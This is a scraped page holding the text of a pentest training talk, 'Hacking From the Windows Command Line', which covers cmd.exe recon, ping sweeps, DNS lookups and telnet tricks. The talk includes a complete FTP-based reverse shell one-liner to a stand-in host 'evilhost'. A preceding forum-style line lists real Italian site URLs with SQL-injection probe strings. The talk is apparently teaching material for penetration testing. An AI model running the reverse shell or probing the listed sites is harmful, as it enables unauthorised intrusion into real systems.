Leaderboard

Siti Web - Web marketing - Indicizzazione Motori di Ricerca - Registrazione Domini http://www.puntodistella.it/ricerca.asp?Keyword='&B1=' http://www.voceditalia.it/articolo.asp?' http://www.torreomnia.it/forum/leggi.asp?id=45566' e doar un offtopic nu luati in seama ..vb si eu aiurea...aviz amatorilor de posting hunt" nu denaturati cu hck req..si altele ca in cazul acesta nu sunteti mai buni ca ei !

Chris Clymer, CISSP ChrisClymer.com/articles/hacking_windows Who am I? I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA I'm not even very good at Minesweeper I'm a UNIX geek I love the command line How much you ask? This entire presentation was created by writing out HTML markup by hand in the Vim text editor Why are you getting Windows tips from a UNIX guy? It turns out that for some reason, not every system runs UNIX In fact, the ones we're most concerned about in Information Security are often running Windows (strange!) Bearded UNIX guys need to get cozy in the WIN32 world Windows veterans benefit from learning to better leverage their OS's CLI This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe" Why hack without your tools? You can't always guarantee that you'll have your toolbox available Relying on your tools can limit you You want to impress women with your leet CLI skills The vast majority of the commands I will show you today should work on a typical modern Windows installation Our friend command.exe This lab will focus on command.exe Powershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platforms You can launch it by going to Start -> Run -> cmd Our Building Blocks Find \i "foo" file - searches through the file "file" for the string "foo". The "\i" makes it case-insensitive Ping -n 5 host - sends 5 ICMP ping packets to host Telnet host port - spawns an interactive telnet session to host. If is specified, this is used instead of the default Telnet port of 21 Command Control and Redirection command1 & command2 - Run command1 and then command2 command1 && command2 - Run command1 only if command2 runs successfully command1 || command2 - Execute command1 only when command2 does NOT run successfully command > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist. command >> "output.txt" - Concatenate output from command onto the end of file "output.txt" command1 | command2 - Pipe the output of command1 into command2 You can direct the errors from a command using 2> errors.txt System Reconnaissance set - show environment variables net user - show local users net localgroups - show local groups sc query - list running services sc query state= all - list all services wmic process list full - show details on all running processes tasklist /svc - show all running processess and associated services Network Reconnaissance netstat -nao - show all current network activity, including PID's netsh firewall show config - display windows firewall configuration ipconfig /displaydns - systems this host has recently resolved through DNS arp -a - systems on the same subnet this host has recently communicated with nslookup - all purpose DNS query tool Let's Try One Clear your DNS cache: ipconfig /flushdns ipconfig /displaydns should only show your localhost: Let's Try One Now lets add an entry: ping google.com Another ipconfig /displaydns should show the new entry for google.com More on Nslookup nslookup some host - will lookup that host in DNS based on your localhost's DNS configuration nslookup - starts nslookup in interactive mode set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR. ls -d example.com - if the server allows it, does a zone transfer of example.com ls -t example.com - will give a list of member servers from the domain Fun with Telnet! Telnet is just an outdated, insecure remote administration tool right? What happens when you telnet to a port other than 21? Turns out many protocols are simple enough to interact with over telnet Telnet can stand in for Netcat for 1-way communication with remote hosts Lets test out some HTTP You won'y be able to see what you're typing once you've started telnet First type GET /index.html http/1.1 and hit return Lets test out some HTTP You should see something like the response below Lets test out some BAD HTTP This time we'll type GET blah This time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages What about SMTP? Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25 Now that we're talking to the server we'll start the session by typing EHLO and then hitting enter type quit when ready to end the session If you know your SMTP syntax, you can send email this way Telnet isn't the only choice Many default Windows CLI apps can interact with a network Many of these offer shell-like functionality and flexibility These apps can fill your Netcat niche when uploading nc.exe isn't an option Reverse shell using FTP echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt & echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j l>output.txt & del commands.txt) & ping -n 4 127.0.0.1) Explanation of FTP Reverse Shell This command will be run on a compromised host The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw" Next it will upload the content of "output.txt" to evilhost Finally it will download "commands.txt" from evilhost, and run whatever is inside All of this is done in an infinite loop As long as the commands in "commands .txt" direct their output to "output.txt" evilhost will get the results Lets Talk About Loops FOR /L - these loops are counters: FOR /L %i in (1,1,10) echo "Hello World" - prints "Hello World" 10 times FOR /F - these loops are iterators FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line Neat Shell Control Tricks FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0 ping -n 4 127.0.0.1 - effectively "sleep 4". The windows shell has no "sleep" command, so a local ping can stand-in Network Scanning with Ping FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply" This command will ping every host from 10.10.10.1 - 10.10.10.255 By using find to parse through the results for "Reply" we only see the hosts which are responding By using @ping we prevent the ping commands themselves from showing in the terminal Reverse DNS Lookups FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name" Once again we're iterating through all hosts in the 10.10.10.0/24 network This time we will first echo each hosts IP to the terminal Next we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output! Searching through the results for "Name" gets us the part we care about Other Useful Commands type - show the contents of a file openfiles /local on - enable openfiles logging(requires reboot) openfiles /query /v - show details on all open files reg query [KeyName] - display value of registry key [KeyName] net use - mount fileshare Resources "Pen-Test Ninjitsu: Part 1" - Core Security Technologies "Built-in Windows Commands to Determine if a System has been Hacked" - Built-in Windows commands to determine if a system has been hacked "Nslookup and DNS Zone Transfers" - nslookup and DNS Zone Transfers SANS 560 Network Penetration Testing and Ethical Hacking - Ed Skoudis SANS: Computer Security Training, Network Security Research, InfoSec Resources Windows Command Line Second Edition - William Stanek (Microsoft Press) "Creating a Remote Command Shell using Default Windows Command Line Tools" - Kevin Bong, SANSFire 2008 SANS 560 If you found this lab useful, I strongly reccomend taking Ed Skoudis's SANS 560 course Ed is the best resource I have found for this sort of usage of the Windows CLI Much of this lab was based on my experience taking the 560 course Ed's 1-day Windows Scripting course covers this material as well Plus he's got much better war stories than I do! Hacking From the Windows Command Line